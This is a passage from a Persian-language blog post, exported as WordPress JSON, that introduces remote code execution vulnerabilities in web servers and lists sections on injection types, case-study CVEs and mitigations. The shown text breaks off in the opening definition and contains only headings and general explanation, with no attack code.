{"id":105172,"date":"2025-04-08T21:48:43","date_gmt":"2025-04-08T17:18:43","guid":{"rendered":"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/"},"modified":"2025-04-08T21:48:43","modified_gmt":"2025-04-08T17:18:43","slug":"%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev","status":"publish","type":"post","link":"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/","title":{"rendered":"\u06a9\u0627\u0628\u0648\u0633 \u0633\u0631\u0648\u0631 \u0648\u0628 &#8211; \u062c\u0627\u0645\u0639\u0647 dev"},"content":{"rendered":"<div data-article-id=\"2392058\" id=\"article-body\">\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-hierarchy ez-toc-counter-rtl ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u0641\u0647\u0631\u0633\u062a \u0645\u0637\u0627\u0644\u0628<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D9%82%D8%AF%D9%85%D9%87\" >\u0645\u0642\u062f\u0645\u0647<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D8%AC%D8%B1%D8%A7%DB%8C_%DA%A9%D8%AF_%D8%A7%D8%B2_%D8%B1%D8%A7%D9%87_%D8%AF%D9%88%D8%B1_RCE_%DA%86%DB%8C%D8%B3%D8%AA%D8%9F\" >\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0686\u06cc\u0633\u062a\u061f<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D9%86%D9%88%D8%A7%D8%B9_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_RCE_%D9%85%D8%B4%D8%AA%D8%B1%DA%A9_%D8%AF%D8%B1_%D8%B3%D8%B1%D9%88%D8%B1%D9%87%D8%A7%DB%8C_%D9%88%D8%A8\" >\u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%AA%D8%B2%D8%B1%DB%8C%D9%82\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642:<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D9%81%D8%B1%D9%85%D8%A7%D9%86\" >\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_SQL_%D8%A8%D9%87_RCE\" >\u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 RCE<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_LDAP\" >\u062a\u0632\u0631\u06cc\u0642 LDAP<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D8%B4%D8%AF%D9%86_%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D9%BE%D8%B4%D8%AA%DB%8C_%D9%BE%D9%86%D9%87%D8%A7%D9%86\" >\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646: \u067e\u0634\u062a\u06cc \u067e\u0646\u0647\u0627\u0646<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D8%AB%D8%A7%D9%84_%D8%AF%D8%B1_%D9%81%D9%84%D8%A7%D8%B3%DA%A9_%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86\" >\u0645\u062b\u0627\u0644 \u062f\u0631 \u0641\u0644\u0627\u0633\u06a9 \u067e\u0627\u06cc\u062a\u0648\u0646:<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%DA%AF%D9%86%D8%AC%D8%A7%D9%86%D8%AF%D9%86_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87_LFI_%D9%88_RFI\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 (LFI \u0648 RFI)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%A8%D8%A7%D8%B1%DA%AF%D8%B0%D8%A7%D8%B1%DB%8C_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87\" >\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%B3%D8%B1%D8%B1%DB%8C%D8%B2_%D8%A8%D8%A7%D9%81%D8%B1_%D9%82%D8%AF%DB%8C%D9%85%DB%8C_%D8%A7%D9%85%D8%A7_%D8%B7%D9%84%D8%A7\" >\u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631: \u0642\u062f\u06cc\u0645\u06cc \u0627\u0645\u0627 \u0637\u0644\u0627<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D8%A7%D9%84%DA%AF%D9%88%DB%8C_%D8%B3%D9%85%D8%AA_%D8%B3%D8%B1%D9%88%D8%B1_SSTI\" >\u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSTI)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%DA%86%DA%AF%D9%88%D9%86%D9%87_%D9%87%DA%A9%D8%B1%D9%87%D8%A7_%D8%A7%D8%B2_RCE_%D8%A7%D8%B3%D8%AA%D9%81%D8%A7%D8%AF%D9%87_%D9%85%DB%8C_%DA%A9%D9%86%D9%86%D8%AF_%DA%AF%D8%A7%D9%85_%D8%A8%D9%87_%DA%AF%D8%A7%D9%85\" >\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f (\u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645)<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#1_%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C\" >1. \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#2_%D8%AA%DA%A9%D9%86%DB%8C%DA%A9_%D9%87%D8%A7%DB%8C_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\" >2. \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#3_%D8%AA%D8%AD%D9%88%DB%8C%D9%84_%D8%A8%D8%A7%D8%B1\" >3. \u062a\u062d\u0648\u06cc\u0644 \u0628\u0627\u0631<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#4_%D9%BE%D8%B3_%D8%A7%D8%B2_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\" >4. \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%AA%D8%A3%D8%AB%DB%8C%D8%B1_%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%D9%85%D9%88%D9%81%D9%82%DB%8C%D8%AA_%D8%A2%D9%85%DB%8C%D8%B2_RCE\" >\u062a\u0623\u062b\u06cc\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 RCE<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%85%D8%B7%D8%A7%D9%84%D8%B9%D8%A7%D8%AA_%D9%85%D9%88%D8%B1%D8%AF%DB%8C_RCE_%D8%A8%D8%A7_%D9%85%D8%B4%D8%AE%D8%B5%D8%A7%D8%AA_%D8%A8%D8%A7%D9%84%D8%A7\" >\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#1_Ivanti_Connect_Secure_%D9%88_Policy_Secure_CVE-2024-21887_CVE-2023-46805\" >1. Ivanti Connect Secure \u0648 Policy Secure (CVE-2024-21887 &#038; CVE-2023-46805)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#2_Apache_Struts_2_CVE-2024-53677\" >2. Apache Struts 2 (CVE-2024-53677)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#3_PHP_%D8%AF%D8%B1_%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2_CVE-2024-4577\" >3. PHP \u062f\u0631 \u0648\u06cc\u0646\u062f\u0648\u0632 (CVE-2024-4577)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#4_Apache_Tomcat_CVE-2025-24813\" >4. Apache Tomcat (CVE-2025-24813)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#5_%D8%B3%D8%A7%DB%8C%D8%B1_%D8%B3%DB%8C%D8%B3%D8%AA%D9%85_%D8%B9%D8%A7%D9%85%D9%84_%D9%87%D8%A7%DB%8C_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1\" >5. \u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631<\/a><\/li><\/ul><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A7%D8%B3%D8%AA%D8%B1%D8%A7%D8%AA%DA%98%DB%8C_%D9%87%D8%A7%DB%8C_%DA%A9%D8%A7%D9%87%D8%B4\" >\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%A8%DB%8C%D9%86%D8%B4_%D9%85%D8%AA%D8%AE%D8%B5%D8%B5\" >\u0628\u06cc\u0646\u0634 \u0645\u062a\u062e\u0635\u0635<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D9%BE%D8%A7%DB%8C%D8%A7%D9%86\" >\u067e\u0627\u06cc\u0627\u0646<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/nabfollower.com\/blog\/%da%a9%d8%a7%d8%a8%d9%88%d8%b3-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d8%a8-%d8%ac%d8%a7%d9%85%d8%b9%d9%87-dev\/#%D8%BA%D8%B0%D8%A7%DB%8C_%D8%A7%D8%B5%D9%84%DB%8C\" >\u063a\u0630\u0627\u06cc \u0627\u0635\u0644\u06cc:<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"%D9%85%D9%82%D8%AF%D9%85%D9%87\"><\/span>\n<p>  <strong>\u0645\u0642\u062f\u0645\u0647<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u06cc\u06a9 \u063a\u0631\u06cc\u0628\u0647 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0628\u062f\u0648\u0646 \u0627\u062c\u0627\u0632\u0647 \u0634\u0645\u0627 \u062f\u0631 \u067e\u0634\u062a \u0635\u0641\u062d\u0647 \u0631\u0627\u06cc\u0627\u0646\u0647 \u062e\u0648\u062f \u0628\u0646\u0634\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0648\u0627\u0642\u0639\u06cc\u062a \u0648\u062d\u0634\u062a\u0646\u0627\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0627\u0633\u062a. \u062f\u0631 \u0633\u0627\u0644\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u060c \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0647\u0627\u06cc \u0645\u0647\u0645 \u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0631\u062a\u0631 \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u060c \u0642\u0631\u0628\u0627\u0646\u06cc \u062d\u0645\u0644\u0627\u062a \u0633\u0627\u06a9\u062a \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 \u0648\u06cc\u0631\u0627\u0646\u06af\u0631 RCE \u0634\u062f\u0647 \u0627\u0646\u062f. \u062a\u0646\u0647\u0627 \u062f\u0631 \u0698\u0627\u0646\u0648\u06cc\u0647 \u0633\u0627\u0644 2024 \u060c \u0628\u06cc\u0634 \u0627\u0632 2\u060c000 \u062f\u0633\u062a\u06af\u0627\u0647 VPN Ivanti \u0628\u0647 \u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0646\u062f &#8211; \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u06a9\u0627\u0631\u062e\u0627\u0646\u0647.<\/p>\n<p>\u0627\u06cc\u0646 \u0645\u0642\u0627\u0644\u0647 \u062f\u0631 \u0627\u0639\u0645\u0627\u0642 \u062f\u0646\u06cc\u0627\u06cc RCE \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f. \u0634\u0645\u0627 \u06cc\u0627\u062f \u0645\u06cc \u06af\u06cc\u0631\u06cc\u062f \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u060c \u0686\u06af\u0648\u0646\u06af\u06cc \u0645\u062a\u062d\u0645\u0644 \u0634\u062f\u0646 \u0633\u0627\u0632\u0645\u0627\u0646 \u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0648 \u0686\u06af\u0648\u0646\u06af\u06cc \u0645\u062d\u0627\u0641\u0638\u062a \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0622\u0646\u0647\u0627 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f. \u0628\u0627 \u062a\u0628\u062f\u06cc\u0644 \u0634\u062f\u0646 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647 \u062a\u0631 \u0648 \u06af\u0633\u062a\u0631\u062f\u0647 \u062a\u0631 \u060c \u062f\u0631\u06a9 RCE \u062f\u06cc\u06af\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631\u06cc \u0646\u06cc\u0633\u062a &#8211; \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a.<\/p>\n<p><strong>\u067e\u0627\u06cc\u0627\u0646 \u0646\u0627\u0645\u0647<\/strong>: \u0627\u06cc\u0646 \u0648\u0628\u0644\u0627\u06af \u0628\u0647 \u0628\u0631\u0631\u0633\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc RCE \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u060c \u0627\u0631\u0627\u0626\u0647 \u0628\u06cc\u0646\u0634 \u0641\u0646\u06cc \u060c \u0646\u0645\u0648\u0646\u0647 \u0647\u0627\u06cc \u062f\u0646\u06cc\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0648 \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc \u0639\u0645\u0644\u06cc \u0628\u0631\u0627\u06cc \u0639\u0644\u0627\u0642\u0647 \u0645\u0646\u062f\u0627\u0646 \u0628\u0647 \u0641\u0646\u0627\u0648\u0631\u06cc \u0648 \u0645\u062a\u062e\u0635\u0635\u0627\u0646 \u0645\u06cc \u067e\u0631\u062f\u0627\u0632\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D8%AC%D8%B1%D8%A7%DB%8C_%DA%A9%D8%AF_%D8%A7%D8%B2_%D8%B1%D8%A7%D9%87_%D8%AF%D9%88%D8%B1_RCE_%DA%86%DB%8C%D8%B3%D8%AA%D8%9F\"><\/span>\n<p>  <strong>\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0686\u06cc\u0633\u062a\u061f<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0627 \u0631\u0648\u06cc \u06cc\u06a9 